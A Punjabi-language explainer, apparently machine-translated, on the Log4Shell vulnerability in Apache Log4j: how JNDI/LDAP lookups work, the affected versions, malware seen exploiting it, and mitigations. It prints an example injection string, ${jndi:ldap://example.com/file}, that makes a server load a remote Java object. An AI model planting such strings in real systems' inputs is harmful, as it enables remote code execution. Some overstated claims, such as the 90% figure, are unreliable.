ਵਿਸ਼ਾ - ਸੂਚੀ[ਛੁਪਾਓ][ਦਿਖਾਓ]
ਨਵੰਬਰ 2021 ਦੇ ਅਖੀਰ ਵਿੱਚ, ਅਸੀਂ ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਲਈ ਇੱਕ ਵੱਡੇ ਖਤਰੇ ਦਾ ਪਤਾ ਲਗਾਇਆ। ਇਹ ਸ਼ੋਸ਼ਣ ਸੰਭਾਵੀ ਤੌਰ 'ਤੇ ਦੁਨੀਆ ਭਰ ਦੇ ਲੱਖਾਂ ਕੰਪਿਊਟਰ ਸਿਸਟਮਾਂ ਨੂੰ ਪ੍ਰਭਾਵਿਤ ਕਰੇਗਾ।
ਇਹ Log4j ਕਮਜ਼ੋਰੀ ਬਾਰੇ ਇੱਕ ਗਾਈਡ ਹੈ ਅਤੇ ਕਿਵੇਂ ਇੱਕ ਨਜ਼ਰਅੰਦਾਜ਼ ਡਿਜ਼ਾਇਨ ਨੁਕਸ ਨੇ ਦੁਨੀਆ ਦੀਆਂ 90% ਤੋਂ ਵੱਧ ਕੰਪਿਊਟਰ ਸੇਵਾਵਾਂ ਨੂੰ ਹਮਲੇ ਲਈ ਖੁੱਲ੍ਹਾ ਛੱਡ ਦਿੱਤਾ ਹੈ।
Apache Log4j ਇੱਕ ਓਪਨ-ਸੋਰਸ ਜਾਵਾ-ਅਧਾਰਿਤ ਲੌਗਿੰਗ ਉਪਯੋਗਤਾ ਹੈ ਜੋ ਅਪਾਚੇ ਸੌਫਟਵੇਅਰ ਫਾਊਂਡੇਸ਼ਨ ਦੁਆਰਾ ਵਿਕਸਤ ਕੀਤੀ ਗਈ ਹੈ। ਅਸਲ ਵਿੱਚ 2001 ਵਿੱਚ Ceki Gülcü ਦੁਆਰਾ ਲਿਖਿਆ ਗਿਆ ਸੀ, ਇਹ ਹੁਣ ਅਪਾਚੇ ਲੌਗਿੰਗ ਸੇਵਾਵਾਂ ਦਾ ਹਿੱਸਾ ਹੈ, ਅਪਾਚੇ ਸੌਫਟਵੇਅਰ ਫਾਊਂਡੇਸ਼ਨ ਦਾ ਇੱਕ ਪ੍ਰੋਜੈਕਟ।
ਦੁਨੀਆ ਭਰ ਦੀਆਂ ਕੰਪਨੀਆਂ ਆਪਣੀਆਂ ਐਪਲੀਕੇਸ਼ਨਾਂ 'ਤੇ ਲੌਗਿੰਗ ਨੂੰ ਸਮਰੱਥ ਬਣਾਉਣ ਲਈ Log4j ਲਾਇਬ੍ਰੇਰੀ ਦੀ ਵਰਤੋਂ ਕਰਦੀਆਂ ਹਨ। ਵਾਸਤਵ ਵਿੱਚ, ਜਾਵਾ ਲਾਇਬ੍ਰੇਰੀ ਇੰਨੀ ਸਰਵ ਵਿਆਪਕ ਹੈ, ਤੁਸੀਂ ਇਸਨੂੰ ਐਮਾਜ਼ਾਨ, ਮਾਈਕ੍ਰੋਸਾਫਟ, ਗੂਗਲ ਅਤੇ ਹੋਰਾਂ ਤੋਂ ਐਪਲੀਕੇਸ਼ਨਾਂ ਵਿੱਚ ਲੱਭ ਸਕਦੇ ਹੋ।
ਲਾਇਬ੍ਰੇਰੀ ਦੀ ਪ੍ਰਮੁੱਖਤਾ ਦਾ ਮਤਲਬ ਹੈ ਕਿ ਕੋਡ ਵਿੱਚ ਕੋਈ ਵੀ ਸੰਭਾਵੀ ਨੁਕਸ ਲੱਖਾਂ ਕੰਪਿਊਟਰਾਂ ਨੂੰ ਹੈਕਿੰਗ ਲਈ ਖੁੱਲ੍ਹਾ ਛੱਡ ਸਕਦਾ ਹੈ। 24 ਨਵੰਬਰ 2021 ਨੂੰ, ਏ ਬੱਦਲ ਸੁਰੱਖਿਆ ਅਲੀਬਾਬਾ ਲਈ ਕੰਮ ਕਰ ਰਹੇ ਖੋਜਕਰਤਾ ਨੇ ਇੱਕ ਭਿਆਨਕ ਨੁਕਸ ਲੱਭਿਆ ਹੈ।
Log4j ਕਮਜ਼ੋਰੀ, ਜਿਸਨੂੰ Log4Shell ਵਜੋਂ ਵੀ ਜਾਣਿਆ ਜਾਂਦਾ ਹੈ, 2013 ਤੋਂ ਕਿਸੇ ਦਾ ਧਿਆਨ ਨਹੀਂ ਦਿੱਤਾ ਗਿਆ ਸੀ। ਕਮਜ਼ੋਰੀ ਨੇ ਨੁਕਸਾਨਦੇਹ ਐਕਟਰਾਂ ਨੂੰ Log4j ਚਲਾ ਰਹੇ ਪ੍ਰਭਾਵਿਤ ਸਿਸਟਮਾਂ 'ਤੇ ਕੋਡ ਚਲਾਉਣ ਦੀ ਇਜਾਜ਼ਤ ਦਿੱਤੀ। ਇਹ 9 ਦਸੰਬਰ, 2021 ਨੂੰ ਜਨਤਕ ਤੌਰ 'ਤੇ ਖੁਲਾਸਾ ਕੀਤਾ ਗਿਆ ਸੀ
ਉਦਯੋਗ ਮਾਹਰ Log4Shell ਫਲਾਅ ਨੂੰ ਕਹਿੰਦੇ ਹਨ ਤਾਜ਼ਾ ਮੈਮੋਰੀ ਵਿੱਚ ਸਭ ਤੋਂ ਵੱਡੀ ਕਮਜ਼ੋਰੀ.
ਕਮਜ਼ੋਰੀ ਦੇ ਪ੍ਰਕਾਸ਼ਨ ਤੋਂ ਬਾਅਦ ਹਫ਼ਤੇ ਵਿੱਚ, ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਟੀਮਾਂ ਨੇ ਲੱਖਾਂ ਹਮਲਿਆਂ ਦਾ ਪਤਾ ਲਗਾਇਆ। ਕੁਝ ਖੋਜਕਰਤਾਵਾਂ ਨੇ ਪ੍ਰਤੀ ਮਿੰਟ ਸੌ ਤੋਂ ਵੱਧ ਹਮਲਿਆਂ ਦੀ ਦਰ ਵੀ ਵੇਖੀ।
ਇਸ ਨੂੰ ਕੰਮ ਕਰਦਾ ਹੈ?
ਇਹ ਸਮਝਣ ਲਈ ਕਿ Log4Shell ਇੰਨਾ ਖ਼ਤਰਨਾਕ ਕਿਉਂ ਹੈ, ਸਾਨੂੰ ਇਹ ਸਮਝਣ ਦੀ ਲੋੜ ਹੈ ਕਿ ਇਹ ਕੀ ਸਮਰੱਥ ਹੈ।
Log4Shell ਕਮਜ਼ੋਰੀ ਆਪਹੁਦਰੇ ਕੋਡ ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਦੀ ਆਗਿਆ ਦਿੰਦੀ ਹੈ, ਜਿਸਦਾ ਅਸਲ ਵਿੱਚ ਮਤਲਬ ਹੈ ਕਿ ਇੱਕ ਹਮਲਾਵਰ ਇੱਕ ਨਿਸ਼ਾਨਾ ਮਸ਼ੀਨ 'ਤੇ ਕੋਈ ਕਮਾਂਡ ਜਾਂ ਕੋਡ ਚਲਾ ਸਕਦਾ ਹੈ।
ਇਹ ਇਸ ਨੂੰ ਕਿਵੇਂ ਪੂਰਾ ਕਰਦਾ ਹੈ?
ਪਹਿਲਾਂ, ਸਾਨੂੰ ਇਹ ਸਮਝਣ ਦੀ ਲੋੜ ਹੈ ਕਿ ਜੇਐਨਡੀਆਈ ਕੀ ਹੈ।
Java ਨੇਮਿੰਗ ਅਤੇ ਡਾਇਰੈਕਟਰੀ ਇੰਟਰਫੇਸ (JNDI) ਇੱਕ ਜਾਵਾ ਸੇਵਾ ਹੈ ਜੋ Java ਪ੍ਰੋਗਰਾਮਾਂ ਨੂੰ ਇੱਕ ਨਾਮ ਦੁਆਰਾ ਡੇਟਾ ਅਤੇ ਸਰੋਤਾਂ ਨੂੰ ਖੋਜਣ ਅਤੇ ਖੋਜਣ ਦੀ ਆਗਿਆ ਦਿੰਦੀ ਹੈ। ਇਹ ਡਾਇਰੈਕਟਰੀ ਸੇਵਾਵਾਂ ਮਹੱਤਵਪੂਰਨ ਹਨ ਕਿਉਂਕਿ ਇਹ ਡਿਵੈਲਪਰਾਂ ਨੂੰ ਐਪਲੀਕੇਸ਼ਨ ਬਣਾਉਣ ਵੇਲੇ ਆਸਾਨੀ ਨਾਲ ਹਵਾਲਾ ਦੇਣ ਲਈ ਰਿਕਾਰਡਾਂ ਦਾ ਇੱਕ ਸੰਗਠਿਤ ਸੈੱਟ ਪ੍ਰਦਾਨ ਕਰਦੀਆਂ ਹਨ।
JNDI ਕਿਸੇ ਖਾਸ ਡਾਇਰੈਕਟਰੀ ਤੱਕ ਪਹੁੰਚ ਕਰਨ ਲਈ ਵੱਖ-ਵੱਖ ਪ੍ਰੋਟੋਕੋਲਾਂ ਦੀ ਵਰਤੋਂ ਕਰ ਸਕਦਾ ਹੈ। ਇਹਨਾਂ ਪ੍ਰੋਟੋਕੋਲਾਂ ਵਿੱਚੋਂ ਇੱਕ ਲਾਈਟਵੇਟ ਡਾਇਰੈਕਟਰੀ ਐਕਸੈਸ ਪ੍ਰੋਟੋਕੋਲ, ਜਾਂ LDAP ਹੈ।
ਇੱਕ ਸਤਰ ਨੂੰ ਲੌਗ ਕਰਨ ਵੇਲੇ, log4j ਜਦੋਂ ਉਹ ਫਾਰਮ ਦੇ ਸਮੀਕਰਨਾਂ ਦਾ ਸਾਹਮਣਾ ਕਰਦੇ ਹਨ ਤਾਂ ਸਟ੍ਰਿੰਗ ਬਦਲਦਾ ਹੈ ${prefix:name}
.
ਉਦਾਹਰਣ ਲਈ, Text: ${java:version}
ਟੈਕਸਟ ਦੇ ਤੌਰ ਤੇ ਲੌਗ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ: Java ਸੰਸਕਰਣ 1.8.0_65. ਇਸ ਤਰ੍ਹਾਂ ਦੇ ਬਦਲ ਆਮ ਹਨ।
ਸਾਡੇ ਕੋਲ ਸਮੀਕਰਨ ਵੀ ਹੋ ਸਕਦੇ ਹਨ ਜਿਵੇਂ ਕਿ Text: ${jndi:ldap://example.com/file}
ਜੋ ਕਿ LDAP ਪ੍ਰੋਟੋਕੋਲ ਰਾਹੀਂ ਇੱਕ URL ਤੋਂ Java ਆਬਜੈਕਟ ਲੋਡ ਕਰਨ ਲਈ JNDI ਸਿਸਟਮ ਦੀ ਵਰਤੋਂ ਕਰਦਾ ਹੈ।
ਇਹ ਉਸ URL ਤੋਂ ਆਉਣ ਵਾਲੇ ਡੇਟਾ ਨੂੰ ਮਸ਼ੀਨ ਵਿੱਚ ਪ੍ਰਭਾਵਸ਼ਾਲੀ ਢੰਗ ਨਾਲ ਲੋਡ ਕਰਦਾ ਹੈ। ਕੋਈ ਵੀ ਸੰਭਾਵੀ ਹੈਕਰ ਜਨਤਕ URL 'ਤੇ ਖਤਰਨਾਕ ਕੋਡ ਦੀ ਮੇਜ਼ਬਾਨੀ ਕਰ ਸਕਦਾ ਹੈ ਅਤੇ ਇਸਨੂੰ ਲੌਗ ਕਰਨ ਲਈ Log4j ਦੀ ਵਰਤੋਂ ਕਰਨ ਵਾਲੀਆਂ ਮਸ਼ੀਨਾਂ ਦੀ ਉਡੀਕ ਕਰ ਸਕਦਾ ਹੈ।
ਕਿਉਂਕਿ ਲੌਗ ਸੁਨੇਹਿਆਂ ਦੀ ਸਮੱਗਰੀ ਵਿੱਚ ਉਪਭੋਗਤਾ ਦੁਆਰਾ ਨਿਯੰਤਰਿਤ ਡੇਟਾ ਹੁੰਦਾ ਹੈ, ਹੈਕਰ ਆਪਣੇ ਖੁਦ ਦੇ JNDI ਹਵਾਲੇ ਪਾ ਸਕਦੇ ਹਨ ਜੋ ਉਹਨਾਂ ਦੁਆਰਾ ਨਿਯੰਤਰਿਤ LDAP ਸਰਵਰਾਂ ਵੱਲ ਇਸ਼ਾਰਾ ਕਰਦੇ ਹਨ। ਇਹ LDAP ਸਰਵਰ ਖਤਰਨਾਕ Java ਆਬਜੈਕਟ ਨਾਲ ਭਰੇ ਹੋਏ ਹੋ ਸਕਦੇ ਹਨ ਜੋ JNDI ਕਮਜ਼ੋਰੀ ਦੁਆਰਾ ਚਲਾ ਸਕਦਾ ਹੈ।
ਕਿਹੜੀ ਚੀਜ਼ ਇਸ ਨੂੰ ਬਦਤਰ ਬਣਾਉਂਦੀ ਹੈ ਇਹ ਹੈ ਕਿ ਇਸ ਨਾਲ ਕੋਈ ਫਰਕ ਨਹੀਂ ਪੈਂਦਾ ਕਿ ਐਪਲੀਕੇਸ਼ਨ ਸਰਵਰ-ਸਾਈਡ ਜਾਂ ਕਲਾਇੰਟ-ਸਾਈਡ ਐਪਲੀਕੇਸ਼ਨ ਹੈ।
ਜਿੰਨਾ ਚਿਰ ਲਾਗਰ ਲਈ ਹਮਲਾਵਰ ਦੇ ਖਤਰਨਾਕ ਕੋਡ ਨੂੰ ਪੜ੍ਹਨ ਦਾ ਕੋਈ ਤਰੀਕਾ ਹੈ, ਐਪਲੀਕੇਸ਼ਨ ਅਜੇ ਵੀ ਸ਼ੋਸ਼ਣ ਲਈ ਖੁੱਲ੍ਹੀ ਹੈ।
ਕੌਣ ਪ੍ਰਭਾਵਿਤ ਹੋਇਆ ਹੈ?
ਕਮਜ਼ੋਰੀ ਉਹਨਾਂ ਸਾਰੇ ਸਿਸਟਮਾਂ ਅਤੇ ਸੇਵਾਵਾਂ ਨੂੰ ਪ੍ਰਭਾਵਿਤ ਕਰਦੀ ਹੈ ਜੋ APache Log4j ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹਨ, ਵਰਜਨ 2.0 ਤੱਕ ਅਤੇ 2.14.1 ਸਮੇਤ।
ਕਈ ਸੁਰੱਖਿਆ ਮਾਹਰ ਸਲਾਹ ਦਿੰਦੇ ਹਨ ਕਿ ਕਮਜ਼ੋਰੀ Java ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹੋਏ ਕਈ ਐਪਲੀਕੇਸ਼ਨਾਂ ਨੂੰ ਪ੍ਰਭਾਵਤ ਕਰ ਸਕਦੀ ਹੈ।
ਮਾਈਕਰੋਸਾਫਟ ਦੀ ਮਲਕੀਅਤ ਵਾਲੀ ਮਾਇਨਕਰਾਫਟ ਵੀਡੀਓ ਗੇਮ ਵਿੱਚ ਸਭ ਤੋਂ ਪਹਿਲਾਂ ਇਹ ਖਰਾਬੀ ਲੱਭੀ ਗਈ ਸੀ। ਮਾਈਕ੍ਰੋਸਾਫਟ ਨੇ ਆਪਣੇ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਅਪੀਲ ਕੀਤੀ ਹੈ ਕਿ ਉਹ ਕਿਸੇ ਵੀ ਜੋਖਮ ਨੂੰ ਰੋਕਣ ਲਈ ਆਪਣੇ ਜਾਵਾ ਐਡੀਸ਼ਨ ਮਾਇਨਕਰਾਫਟ ਸੌਫਟਵੇਅਰ ਨੂੰ ਅਪਗ੍ਰੇਡ ਕਰਨ।
ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਅਤੇ ਬੁਨਿਆਦੀ ਢਾਂਚਾ ਸੁਰੱਖਿਆ ਏਜੰਸੀ (ਸੀਆਈਐਸਏ) ਦੇ ਡਾਇਰੈਕਟਰ ਜੇਨ ਈਸਟਰਲੀ ਦਾ ਕਹਿਣਾ ਹੈ ਕਿ ਵਿਕਰੇਤਾਵਾਂ ਕੋਲ ਏ. ਮੁੱਖ ਜ਼ਿੰਮੇਵਾਰੀ ਇਸ ਕਮਜ਼ੋਰੀ ਦਾ ਸ਼ੋਸ਼ਣ ਕਰਨ ਵਾਲੇ ਖਤਰਨਾਕ ਅਦਾਕਾਰਾਂ ਤੋਂ ਅੰਤਮ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਰੋਕਣ ਲਈ।
"ਵਿਕਰੇਤਾਵਾਂ ਨੂੰ ਇਹ ਯਕੀਨੀ ਬਣਾਉਣ ਲਈ ਆਪਣੇ ਗਾਹਕਾਂ ਨਾਲ ਸੰਚਾਰ ਕਰਨਾ ਚਾਹੀਦਾ ਹੈ ਕਿ ਅੰਤਮ ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਪਤਾ ਹੋਵੇ ਕਿ ਉਹਨਾਂ ਦੇ ਉਤਪਾਦ ਵਿੱਚ ਇਹ ਕਮਜ਼ੋਰੀ ਹੈ ਅਤੇ ਉਹਨਾਂ ਨੂੰ ਸਾਫਟਵੇਅਰ ਅੱਪਡੇਟ ਨੂੰ ਤਰਜੀਹ ਦੇਣੀ ਚਾਹੀਦੀ ਹੈ."
ਕਥਿਤ ਤੌਰ 'ਤੇ ਹਮਲੇ ਪਹਿਲਾਂ ਹੀ ਸ਼ੁਰੂ ਹੋ ਚੁੱਕੇ ਹਨ। Symantec, ਇੱਕ ਕੰਪਨੀ ਜੋ ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਸੌਫਟਵੇਅਰ ਪ੍ਰਦਾਨ ਕਰਦੀ ਹੈ, ਨੇ ਕਈ ਤਰ੍ਹਾਂ ਦੇ ਹਮਲੇ ਦੀਆਂ ਬੇਨਤੀਆਂ ਨੂੰ ਦੇਖਿਆ ਹੈ।
ਇੱਥੇ ਹਮਲਿਆਂ ਦੀਆਂ ਕਿਸਮਾਂ ਦੀਆਂ ਕੁਝ ਉਦਾਹਰਣਾਂ ਹਨ ਜੋ ਖੋਜਕਰਤਾਵਾਂ ਨੇ ਖੋਜੀਆਂ ਹਨ:
- botnets
ਬੋਟਨੈੱਟ ਕੰਪਿਊਟਰਾਂ ਦਾ ਇੱਕ ਨੈਟਵਰਕ ਹੈ ਜੋ ਇੱਕ ਇੱਕਲੇ ਹਮਲਾਵਰ ਧਿਰ ਦੇ ਨਿਯੰਤਰਣ ਵਿੱਚ ਹਨ। ਉਹ DDoS ਹਮਲੇ ਕਰਨ, ਡਾਟਾ ਚੋਰੀ ਕਰਨ ਅਤੇ ਹੋਰ ਘੁਟਾਲੇ ਕਰਨ ਵਿੱਚ ਮਦਦ ਕਰਦੇ ਹਨ। ਖੋਜਕਰਤਾਵਾਂ ਨੇ Log4j ਸ਼ੋਸ਼ਣ ਤੋਂ ਡਾਊਨਲੋਡ ਕੀਤੀਆਂ ਸ਼ੈੱਲ ਸਕ੍ਰਿਪਟਾਂ ਵਿੱਚ ਮੁਹਸਟਿਕ ਬੋਟਨੈੱਟ ਦੇਖਿਆ।
- XMRig ਮਾਈਨਰ ਟਰੋਜਨ
XMRig ਇੱਕ ਓਪਨ-ਸੋਰਸ ਕ੍ਰਿਪਟੋਕੁਰੰਸੀ ਮਾਈਨਰ ਹੈ ਜੋ ਮੋਨੇਰੋ ਟੋਕਨ ਨੂੰ ਮਾਈਨ ਕਰਨ ਲਈ CPUs ਦੀ ਵਰਤੋਂ ਕਰਦਾ ਹੈ। ਸਾਈਬਰ ਅਪਰਾਧੀ ਲੋਕਾਂ ਦੇ ਡਿਵਾਈਸਾਂ 'ਤੇ XMRig ਨੂੰ ਸਥਾਪਿਤ ਕਰ ਸਕਦੇ ਹਨ ਤਾਂ ਜੋ ਉਹ ਆਪਣੀ ਜਾਣਕਾਰੀ ਤੋਂ ਬਿਨਾਂ ਆਪਣੀ ਪ੍ਰੋਸੈਸਿੰਗ ਸ਼ਕਤੀ ਦੀ ਵਰਤੋਂ ਕਰ ਸਕਣ।
- ਖੋਂਸਾਰੀ ਰੈਨਸਮਵੇਅਰ
ਰੈਨਸਮਵੇਅਰ ਮਾਲਵੇਅਰ ਦੇ ਇੱਕ ਰੂਪ ਦਾ ਹਵਾਲਾ ਦਿੰਦਾ ਹੈ ਜਿਸ ਲਈ ਤਿਆਰ ਕੀਤਾ ਗਿਆ ਹੈ ਫਾਈਲਾਂ ਨੂੰ ਐਨਕ੍ਰਿਪਟ ਕਰੋ ਇੱਕ ਕੰਪਿਊਟਰ 'ਤੇ. ਹਮਲਾਵਰ ਫਿਰ ਏਨਕ੍ਰਿਪਟਡ ਫਾਈਲਾਂ ਤੱਕ ਪਹੁੰਚ ਦੇਣ ਦੇ ਬਦਲੇ ਭੁਗਤਾਨ ਦੀ ਮੰਗ ਕਰ ਸਕਦੇ ਹਨ। ਖੋਜਕਰਤਾਵਾਂ ਨੇ Log4Shell ਹਮਲਿਆਂ ਵਿੱਚ ਖੋਂਸਾਰੀ ਰੈਨਸਮਵੇਅਰ ਦੀ ਖੋਜ ਕੀਤੀ। ਉਹ ਵਿੰਡੋਜ਼ ਸਰਵਰਾਂ ਨੂੰ ਨਿਸ਼ਾਨਾ ਬਣਾਉਂਦੇ ਹਨ ਅਤੇ .NET ਫਰੇਮਵਰਕ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹਨ।
ਅੱਗੇ ਕੀ ਹੋਵੇਗਾ?
ਮਾਹਰ ਭਵਿੱਖਬਾਣੀ ਕਰਦੇ ਹਨ ਕਿ Log4J ਕਮਜ਼ੋਰੀ ਦੁਆਰਾ ਪੈਦਾ ਹੋਈ ਹਫੜਾ-ਦਫੜੀ ਨੂੰ ਪੂਰੀ ਤਰ੍ਹਾਂ ਠੀਕ ਕਰਨ ਲਈ ਮਹੀਨੇ ਜਾਂ ਸ਼ਾਇਦ ਸਾਲ ਵੀ ਲੱਗ ਸਕਦੇ ਹਨ।
ਇਸ ਪ੍ਰਕਿਰਿਆ ਵਿੱਚ ਹਰੇਕ ਪ੍ਰਭਾਵਿਤ ਸਿਸਟਮ ਨੂੰ ਪੈਚ ਕੀਤੇ ਸੰਸਕਰਣ ਨਾਲ ਅਪਡੇਟ ਕਰਨਾ ਸ਼ਾਮਲ ਹੁੰਦਾ ਹੈ। ਭਾਵੇਂ ਇਹ ਸਾਰੇ ਸਿਸਟਮ ਪੈਚ ਕੀਤੇ ਗਏ ਹਨ, ਫਿਰ ਵੀ ਸੰਭਾਵਿਤ ਬੈਕਡੋਰਸ ਦਾ ਖਤਰਾ ਹੈ ਜੋ ਹੈਕਰਾਂ ਨੇ ਪਹਿਲਾਂ ਹੀ ਵਿੰਡੋ ਵਿੱਚ ਜੋੜ ਦਿੱਤਾ ਹੈ ਜੋ ਸਰਵਰ ਹਮਲੇ ਲਈ ਖੁੱਲ੍ਹੇ ਸਨ।
ਕਈ ਹੱਲ ਅਤੇ ਕਮੀ ਐਪਲੀਕੇਸ਼ਨਾਂ ਨੂੰ ਇਸ ਬੱਗ ਦੁਆਰਾ ਸ਼ੋਸ਼ਣ ਤੋਂ ਰੋਕਣ ਲਈ ਮੌਜੂਦ ਹੈ। ਨਵੇਂ Log4j ਸੰਸਕਰਣ 2.15.0-rc1 ਨੇ ਇਸ ਕਮਜ਼ੋਰੀ ਨੂੰ ਘਟਾਉਣ ਲਈ ਵੱਖ-ਵੱਖ ਸੈਟਿੰਗਾਂ ਨੂੰ ਬਦਲਿਆ ਹੈ।
JNDI ਦੀ ਵਰਤੋਂ ਕਰਨ ਵਾਲੀਆਂ ਸਾਰੀਆਂ ਵਿਸ਼ੇਸ਼ਤਾਵਾਂ ਨੂੰ ਡਿਫੌਲਟ ਤੌਰ 'ਤੇ ਅਯੋਗ ਕਰ ਦਿੱਤਾ ਜਾਵੇਗਾ ਅਤੇ ਰਿਮੋਟ ਲੁੱਕਅੱਪ ਨੂੰ ਵੀ ਸੀਮਤ ਕੀਤਾ ਗਿਆ ਹੈ। ਤੁਹਾਡੇ Log4j ਸੈੱਟਅੱਪ 'ਤੇ ਲੁੱਕਅਪ ਵਿਸ਼ੇਸ਼ਤਾ ਨੂੰ ਅਸਮਰੱਥ ਬਣਾਉਣ ਨਾਲ ਸੰਭਵ ਸ਼ੋਸ਼ਣ ਦੇ ਜੋਖਮ ਨੂੰ ਘਟਾਉਣ ਵਿੱਚ ਮਦਦ ਮਿਲੇਗੀ।
Log4j ਤੋਂ ਬਾਹਰ, ਓਪਨ-ਸੋਰਸ ਸ਼ੋਸ਼ਣ ਨੂੰ ਰੋਕਣ ਲਈ ਅਜੇ ਵੀ ਇੱਕ ਵਿਆਪਕ ਯੋਜਨਾ ਦੀ ਲੋੜ ਹੈ।
ਇਸ ਤੋਂ ਪਹਿਲਾਂ ਮਈ ਵਿੱਚ, ਵ੍ਹਾਈਟ ਹਾਊਸ ਨੇ ਇੱਕ ਜਾਰੀ ਕੀਤਾ ਸੀ ਕਾਰਜਕਾਰੀ ਹੁਕਮ ਜਿਸਦਾ ਉਦੇਸ਼ ਰਾਸ਼ਟਰੀ ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਨੂੰ ਬਿਹਤਰ ਬਣਾਉਣਾ ਹੈ। ਇਸ ਵਿੱਚ ਸਮੱਗਰੀ ਦੇ ਇੱਕ ਸੌਫਟਵੇਅਰ ਬਿੱਲ (SBOM) ਲਈ ਇੱਕ ਵਿਵਸਥਾ ਸ਼ਾਮਲ ਹੈ ਜੋ ਕਿ ਜ਼ਰੂਰੀ ਤੌਰ 'ਤੇ ਇੱਕ ਰਸਮੀ ਦਸਤਾਵੇਜ਼ ਸੀ ਜਿਸ ਵਿੱਚ ਐਪਲੀਕੇਸ਼ਨ ਬਣਾਉਣ ਲਈ ਲੋੜੀਂਦੀ ਹਰ ਆਈਟਮ ਦੀ ਸੂਚੀ ਹੁੰਦੀ ਸੀ।
ਇਸ ਵਿੱਚ ਭਾਗ ਸ਼ਾਮਲ ਹਨ ਜਿਵੇਂ ਕਿ ਓਪਨ ਸੋਰਸ ਪੈਕੇਜ, ਨਿਰਭਰਤਾ, ਅਤੇ APIs ਵਿਕਾਸ ਲਈ ਵਰਤੇ ਜਾਂਦੇ ਹਨ। ਹਾਲਾਂਕਿ SBOM ਦਾ ਵਿਚਾਰ ਪਾਰਦਰਸ਼ਤਾ ਲਈ ਮਦਦਗਾਰ ਹੈ, ਕੀ ਇਹ ਵਾਕਈ ਉਪਭੋਗਤਾ ਦੀ ਮਦਦ ਕਰੇਗਾ?
ਨਿਰਭਰਤਾ ਨੂੰ ਅੱਪਗ੍ਰੇਡ ਕਰਨਾ ਬਹੁਤ ਜ਼ਿਆਦਾ ਮੁਸ਼ਕਲ ਹੋ ਸਕਦਾ ਹੈ। ਕੰਪਨੀਆਂ ਵਿਕਲਪਕ ਪੈਕੇਜਾਂ ਨੂੰ ਲੱਭਣ ਵਿੱਚ ਵਾਧੂ ਸਮਾਂ ਬਰਬਾਦ ਕਰਨ ਦੇ ਜੋਖਮ ਦੀ ਬਜਾਏ ਕਿਸੇ ਵੀ ਜੁਰਮਾਨੇ ਦਾ ਭੁਗਤਾਨ ਕਰਨ ਦੀ ਚੋਣ ਕਰ ਸਕਦੀਆਂ ਹਨ। ਸ਼ਾਇਦ ਇਹ SBOMs ਤਾਂ ਹੀ ਲਾਭਦਾਇਕ ਹੋਣਗੇ ਜੇਕਰ ਉਹਨਾਂ ਦੇ ਸਕੋਪ ਅੱਗੇ ਸੀਮਿਤ ਹੈ.
ਸਿੱਟਾ
Log4j ਮੁੱਦਾ ਸੰਗਠਨਾਂ ਲਈ ਸਿਰਫ਼ ਇੱਕ ਤਕਨੀਕੀ ਸਮੱਸਿਆ ਤੋਂ ਵੱਧ ਹੈ।
ਕਾਰੋਬਾਰੀ ਨੇਤਾਵਾਂ ਨੂੰ ਸੰਭਾਵੀ ਖਤਰਿਆਂ ਤੋਂ ਜਾਣੂ ਹੋਣਾ ਚਾਹੀਦਾ ਹੈ ਜੋ ਉਦੋਂ ਹੋ ਸਕਦੇ ਹਨ ਜਦੋਂ ਉਹਨਾਂ ਦੇ ਸਰਵਰ, ਉਤਪਾਦ, ਜਾਂ ਸੇਵਾਵਾਂ ਉਹਨਾਂ ਕੋਡ 'ਤੇ ਨਿਰਭਰ ਕਰਦੇ ਹਨ ਜੋ ਉਹ ਖੁਦ ਨਹੀਂ ਰੱਖਦੇ ਹਨ।
ਓਪਨ-ਸੋਰਸ ਅਤੇ ਥਰਡ ਪਾਰਟੀ ਐਪਲੀਕੇਸ਼ਨਾਂ 'ਤੇ ਭਰੋਸਾ ਕਰਨਾ ਹਮੇਸ਼ਾ ਕੁਝ ਖਤਰੇ ਦੇ ਨਾਲ ਆਉਂਦਾ ਹੈ। ਨਵੀਆਂ ਖਤਰਿਆਂ ਦੇ ਸਾਹਮਣੇ ਆਉਣ ਤੋਂ ਪਹਿਲਾਂ ਕੰਪਨੀਆਂ ਨੂੰ ਜੋਖਮ ਘਟਾਉਣ ਦੀਆਂ ਰਣਨੀਤੀਆਂ 'ਤੇ ਕੰਮ ਕਰਨਾ ਚਾਹੀਦਾ ਹੈ।
ਜ਼ਿਆਦਾਤਰ ਵੈੱਬ ਦੁਨੀਆ ਭਰ ਦੇ ਹਜ਼ਾਰਾਂ ਵਾਲੰਟੀਅਰਾਂ ਦੁਆਰਾ ਬਣਾਏ ਗਏ ਓਪਨ-ਸੋਰਸ ਸੌਫਟਵੇਅਰ 'ਤੇ ਨਿਰਭਰ ਕਰਦਾ ਹੈ।
ਜੇਕਰ ਅਸੀਂ ਵੈੱਬ ਨੂੰ ਇੱਕ ਸੁਰੱਖਿਅਤ ਸਥਾਨ ਰੱਖਣਾ ਚਾਹੁੰਦੇ ਹਾਂ, ਤਾਂ ਸਰਕਾਰਾਂ ਅਤੇ ਕਾਰਪੋਰੇਸ਼ਨਾਂ ਨੂੰ ਓਪਨ ਸੋਰਸ ਯਤਨਾਂ ਅਤੇ ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਏਜੰਸੀਆਂ ਜਿਵੇਂ ਕਿ ਫੰਡਿੰਗ ਵਿੱਚ ਨਿਵੇਸ਼ ਕਰਨਾ ਚਾਹੀਦਾ ਹੈ। ਸੀ.ਆਈ.ਐੱਸ.ਏ..
ਕੋਈ ਜਵਾਬ ਛੱਡਣਾ